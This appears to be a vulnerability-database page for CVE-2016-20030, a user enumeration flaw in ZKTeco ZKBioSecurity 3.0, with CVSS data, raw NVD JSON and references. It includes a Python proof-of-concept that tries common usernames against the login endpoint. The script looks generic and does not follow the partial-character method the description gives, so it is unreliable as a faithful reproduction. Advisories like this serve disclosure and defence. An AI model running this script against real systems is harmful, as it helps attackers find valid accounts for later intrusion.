Security Vulnerability Report
中文
CVE-2016-20030 CVSS 9.8 CRITICAL

CVE-2016-20030

Published: 2026-03-16 14:17:50
Last Modified: 2026-04-15 14:56:46
Source: [email protected]

Description

ZKTeco ZKBioSecurity 3.0 contains a user enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by submitting partial characters via the username parameter. Attackers can send requests to the authLoginAction!login.do script with varying username inputs to enumerate valid user accounts based on application responses.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKBioSecurity 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2016-20030 - ZKTeco ZKBioSecurity User Enumeration PoC # Target: ZKTeco ZKBioSecurity 3.0 # Vulnerability: Unauthenticated user enumeration via authLoginAction!login.do TARGET_URL = "http://target.com/authLoginAction!login.do" USERNAME_LIST = ["admin", "root", "user", "test", "administrator", "manager"] def enumerate_users(): """Enumerate valid usernames from ZKBioSecurity login interface""" print(f"[*] Starting user enumeration on {TARGET_URL}") valid_users = [] for username in USERNAME_LIST: payload = { "username": username, "password": "invalid_password_for_testing" } try: response = requests.post(TARGET_URL, data=payload, timeout=10) # Analyze response to determine if username is valid # Valid users typically return different error messages if "user not found" not in response.text.lower() and response.status_code == 200: print(f"[+] Potential valid user found: {username}") valid_users.append(username) else: print(f"[-] User not valid: {username}") except requests.RequestException as e: print(f"[!] Error testing {username}: {str(e)}") print(f"\n[*] Enumeration complete. Found {len(valid_users)} potential users") return valid_users if __name__ == "__main__": enumerate_users()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20030", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:49.727", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains a user enumeration vulnerability that allows unauthenticated attackers to discover valid usernames by submitting partial characters via the username parameter. Attackers can send requests to the authLoginAction!login.do script with varying username inputs to enumerate valid user accounts based on application responses."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene una vulnerabilidad de enumeración de usuarios que permite a atacantes no autenticados descubrir nombres de usuario válidos al enviar caracteres parciales a través del parámetro username. Los atacantes pueden enviar solicitudes al script authLoginAction!login.do con diferentes entradas de nombre de usuario para enumerar cuentas de usuario válidas basándose en las respuestas de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-551"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116485", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138573", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-user-enumeration-via-authloginaction", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.